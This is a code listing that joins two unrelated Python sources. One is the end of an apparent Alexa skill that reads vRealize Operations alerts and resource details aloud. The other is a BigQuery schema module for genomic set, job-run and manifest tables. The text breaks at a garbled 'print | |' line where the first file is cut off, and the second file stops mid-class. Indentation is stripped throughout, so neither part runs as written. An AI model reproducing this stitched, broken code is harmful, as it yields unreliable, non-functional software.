resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more critical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
display_render(title=resource["resourceKey"]["resourceKindKey"] + " details", template="BodyTemplate1", text=text, background_image_url=render_template('backgroundImageURL'), backButton='VISIBLE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBLE", token=None, \
background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
def vropsGetToken(user=vropsuser, passwd=vropspassword, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print | |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from enum import Enum
from rdr_service.model.bq_base import BQTable, BQSchema, BQView, BQField, BQFieldTypeEnum, BQFieldModeEnum
from rdr_service.genomic_enums import GenomicSetStatus as _GenomicSetStatus, \
GenomicSetMemberStatus as _GenomicSetMemberStatus, GenomicValidationFlag as _GenomicValidationFlag, \
GenomicJob as _GenomicJob, GenomicWorkflowState as _GenomicWorkflowState, \
GenomicSubProcessStatus as _GenomicSubProcessStatus, GenomicSubProcessResult as _GenomicSubProcessResult, \
GenomicManifestTypes as _GenomicManifestTypes, GenomicContaminationCategory as _GenomicContaminationCategory, \
GenomicQcStatus as _GenomicQcStatus
# Convert weird participant_enums to standard python enums.
GenomicSetStatusEnum = Enum('GenomicSetStatusEnum', _GenomicSetStatus.to_dict())
GenomicSetMemberStatusEnum = Enum('GenomicSetMemberStatusEnum', _GenomicSetMemberStatus.to_dict())
GenomicValidationFlag = Enum('GenomicValidationFlag', _GenomicValidationFlag.to_dict())
GenomicSubProcessStatusEnum = Enum('GenomicSubProcessStatusEnum', _GenomicSubProcessStatus.to_dict())
GenomicSubProcessResultEnum = Enum('GenomicSubProcessResultEnum', _GenomicSubProcessResult.to_dict())
GenomicJobEnum = Enum('GenomicJobEnum', _GenomicJob.to_dict())
GenomicWorkflowStateEnum = Enum('GenomicWorkflowStateEnum', _GenomicWorkflowState.to_dict())
GenomicQcStatusEnum = Enum('GenomicQcStatusEnum', _GenomicQcStatus.to_dict())
GenomicContaminationCategoryEnum = Enum('GenomicContaminationCategoryEnum', _GenomicContaminationCategory.to_dict())
GenomicManifestTypesEnum = Enum('GenomicManifestTypesEnum', _GenomicManifestTypes.to_dict())
class BQGenomicSetSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve the RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_name = BQField('genomic_set_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_criteria = BQField('genomic_set_criteria', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_version = BQField('genomic_set_version', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
genomic_set_file = BQField('genomic_set_file', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genomic_set_file_time = BQField('genomic_set_file_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_status = BQField('genomic_set_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetStatusEnum)
genomic_set_status_id = BQField('genomic_set_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetStatusEnum)
validated_time = BQField('validated_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
class BQGenomicSet(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_set'
__schema__ = BQGenomicSetSchema
class BQGenomicSetView(BQView):
__viewname__ = 'v_genomic_set'
__viewdescr__ = 'Genomic Set View'
__pk_id__ = 'id'
__table__ = BQGenomicSet
class BQGenomicSetMemberSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve the RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
orig_created = BQField('orig_created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
orig_modified = BQField('orig_modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_set_id = BQField('genomic_set_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
participant_id = BQField('participant_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
ny_flag = BQField('ny_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sex_at_birth = BQField('sex_at_birth', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
genome_type = BQField('genome_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
biobank_id = BQField('biobank_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
package_id = BQField('package_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
validation_status = BQField('validation_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetMemberStatusEnum)
validation_status_id = BQField('validation_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSetMemberStatusEnum)
# validation_flags is an array of GenomicValidationFlag Enum values.
validation_flags = BQField('validation_flags', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
validated_time = BQField('validated_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
sample_id = BQField('sample_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
sample_type = BQField('sample_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
reconcile_cvl_job_run_id = BQField('reconcile_cvl_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
sequencing_file_name = BQField('sequencing_file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
reconcile_gc_manifest_job_run_id = BQField('reconcile_gc_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
reconcile_metrics_bb_manifest_job_run_id = BQField('reconcile_metrics_bb_manifest_job_run_id',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
reconcile_metrics_sequencing_job_run_id = BQField('reconcile_metrics_sequencing_job_run_id',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
ai_an = BQField('ai_an', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_box_plate_id = BQField('gc_manifest_box_plate_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_box_storage_unit_id = BQField('gc_manifest_box_storage_unit_id', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_contact = BQField('gc_manifest_contact', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_email = BQField('gc_manifest_email', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_failure_description = BQField('gc_manifest_failure_description', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_failure_mode = BQField('gc_manifest_failure_mode', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_matrix_id = BQField('gc_manifest_matrix_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_parent_sample_id = BQField('gc_manifest_parent_sample_id', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_quantity_ul = BQField('gc_manifest_quantity_ul', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_sample_source = BQField('gc_manifest_sample_source', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_study = BQField('gc_manifest_study', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_study_pi = BQField('gc_manifest_study_pi', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_test_name = BQField('gc_manifest_test_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_total_concentration_ng_per_ul = BQField('gc_manifest_total_concentration_ng_per_ul',
BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_total_dna_ng = BQField('gc_manifest_total_dna_ng', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
gc_manifest_tracking_number = BQField('gc_manifest_tracking_number', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_treatments = BQField('gc_manifest_treatments', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_manifest_visit_description = BQField('gc_manifest_visit_description', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
gc_manifest_well_position = BQField('gc_manifest_well_position', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gem_a1_manifest_job_run_id = BQField('gem_a1_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
gem_a2_manifest_job_run_id = BQField('gem_a2_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
gem_pass = BQField('gem_pass', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gem_a3_manifest_job_run_id = BQField('gem_a3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
aw3_manifest_job_run_id = BQField('aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
aw4_manifest_job_run_id = BQField('aw4_manifest_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
cvl_aw1c_manifest_job_run_id = BQField('cvl_aw1c_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_aw1cf_manifest_job_run_id = BQField('cvl_aw1cf_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w1_manifest_job_run_id = BQField('cvl_w1_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w2_manifest_job_run_id = BQField('cvl_w2_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w3_manifest_job_run_id = BQField('cvl_w3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w4_manifest_job_run_id = BQField('cvl_w4_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
cvl_w4f_manifest_job_run_id = BQField('cvl_w4f_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
genomic_workflow_state = BQField('genomic_workflow_state', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicWorkflowStateEnum)
genomic_workflow_state_id = BQField('genomic_workflow_state_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicWorkflowStateEnum)
genomic_workflow_state_modified_time = BQField('genomic_workflow_state_modified_time', BQFieldTypeEnum.DATETIME,
BQFieldModeEnum.NULLABLE)
genomic_workflow_state_history = BQField('genomic_workflow_state_history', BQFieldTypeEnum.STRING,
BQFieldModeEnum.NULLABLE)
collection_tube_id = BQField('collection_tube_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
gc_site_id = BQField('gc_site_id', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
arr_aw3_manifest_job_run_id = BQField('arr_aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
wgs_aw3_manifest_job_run_id = BQField('wgs_aw3_manifest_job_run_id', BQFieldTypeEnum.INTEGER,
BQFieldModeEnum.NULLABLE)
report_consent_removal_date = BQField('report_consent_removal_date',
BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
qc_status = BQField('qc_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicQcStatusEnum)
qc_status_id = BQField('qc_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicQcStatusEnum)
fingerprint_path = BQField('fingerprint_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
aw1_file_processed_id = BQField('aw1_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
aw2_file_processed_id = BQField('aw2_file_processed_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
dev_note = BQField('dev_note', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
biobank_id_str = BQField('biobank_id_str', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
aw2f_job_run_id = BQField('aw2f_job_run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
class BQGenomicSetMember(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_set_member'
__schema__ = BQGenomicSetMemberSchema
class BQGenomicSetMemberView(BQView):
__viewname__ = 'v_genomic_set_member'
__viewdescr__ = 'Genomic Set Member View'
__pk_id__ = 'id'
__table__ = BQGenomicSetMember
class BQGenomicJobRunSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# PDR-149: Need to preserve RDR table id values
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
job = BQField('job', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE, fld_enum=GenomicJobEnum)
job_id = BQField('job_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE, fld_enum=GenomicJobEnum)
start_time = BQField('start_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
end_time = BQField('end_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
run_status = BQField('run_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
run_status_id = BQField('run_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
run_result = BQField('run_result', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
run_result_id = BQField('run_result_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
result_message = BQField('result_message', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
class BQGenomicJobRun(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_job_run'
__schema__ = BQGenomicJobRunSchema
class BQGenomicJobRunView(BQView):
__viewname__ = 'v_genomic_job_run'
__viewdescr__ = 'Genomic Job Run View'
__pk_id__ = 'id'
__table__ = BQGenomicJobRun
class BQGenomicFileProcessedSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
run_id = BQField('run_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
start_time = BQField('start_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
end_time = BQField('end_time', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
file_path = BQField('file_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
bucket_name = BQField('bucket_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
file_name = BQField('file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
file_status_id = BQField('file_status_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
file_status = BQField('file_status', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessStatusEnum)
file_result_id = BQField('file_result_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
file_result = BQField('file_result', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicSubProcessResultEnum)
upload_date = BQField('upload_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
genomic_manifest_file_id = BQField('genomic_manifest_file_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
class BQGenomicFileProcessed(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_file_processed'
__schema__ = BQGenomicFileProcessedSchema
class BQGenomicFileProcessedView(BQView):
__viewname__ = 'v_genomic_file_processed'
__viewdescr__ = 'Genomic File Processed View'
__pk_id__ = 'id'
__table__ = BQGenomicFileProcessed
class BQGenomicManifestFileSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
upload_date = BQField('upload_date', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.NULLABLE)
manifest_type_id = BQField('manifest_type_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicManifestTypesEnum)
manifest_type = BQField('manifest_type', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE,
fld_enum=GenomicManifestTypesEnum)
file_path = BQField('file_path', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
bucket_name = BQField('bucket_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
record_count = BQField('record_count', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
rdr_processing_complete = BQField('rdr_processing_complete', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
rdr_processing_complete_date = BQField('rdr_processing_complete_date', BQFieldTypeEnum.DATETIME,
BQFieldModeEnum.NULLABLE)
ignore_flag = BQField('ignore_flag', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
file_name = BQField('file_name', BQFieldTypeEnum.STRING, BQFieldModeEnum.NULLABLE)
class BQGenomicManifestFile(BQTable):
""" BigQuery Table """
__tablename__ = 'genomic_manifest_file'
__schema__ = BQGenomicManifestFileSchema
class BQGenomicManifestFileView(BQView):
__viewname__ = 'v_genomic_manifest_file'
__viewdescr__ = 'Genomic Manifest File View'
__pk_id__ = 'id'
__table__ = BQGenomicManifestFile
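# __sql__ below keeps only the newest record per orig_id (ROW_NUMBER over modified DESC)
# and filters out rows flagged with ignore_flag.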
__sql__ = """
SELECT gmf.*
FROM (
SELECT *,
ROW_NUMBER() OVER (PARTITION BY orig_id ORDER BY modified desc) AS rn
FROM `{project}`.{dataset}.genomic_manifest_file
) gmf
WHERE gmf.rn = 1 and gmf.ignore_flag = 0
"""
class BQGenomicManifestFeedbackSchema(BQSchema):
id = BQField('id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.REQUIRED)
created = BQField('created', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
modified = BQField('modified', BQFieldTypeEnum.DATETIME, BQFieldModeEnum.REQUIRED)
# RDR fields
orig_id = BQField('orig_id', BQFieldTypeEnum.INTEGER, BQFieldModeEnum.NULLABLE)
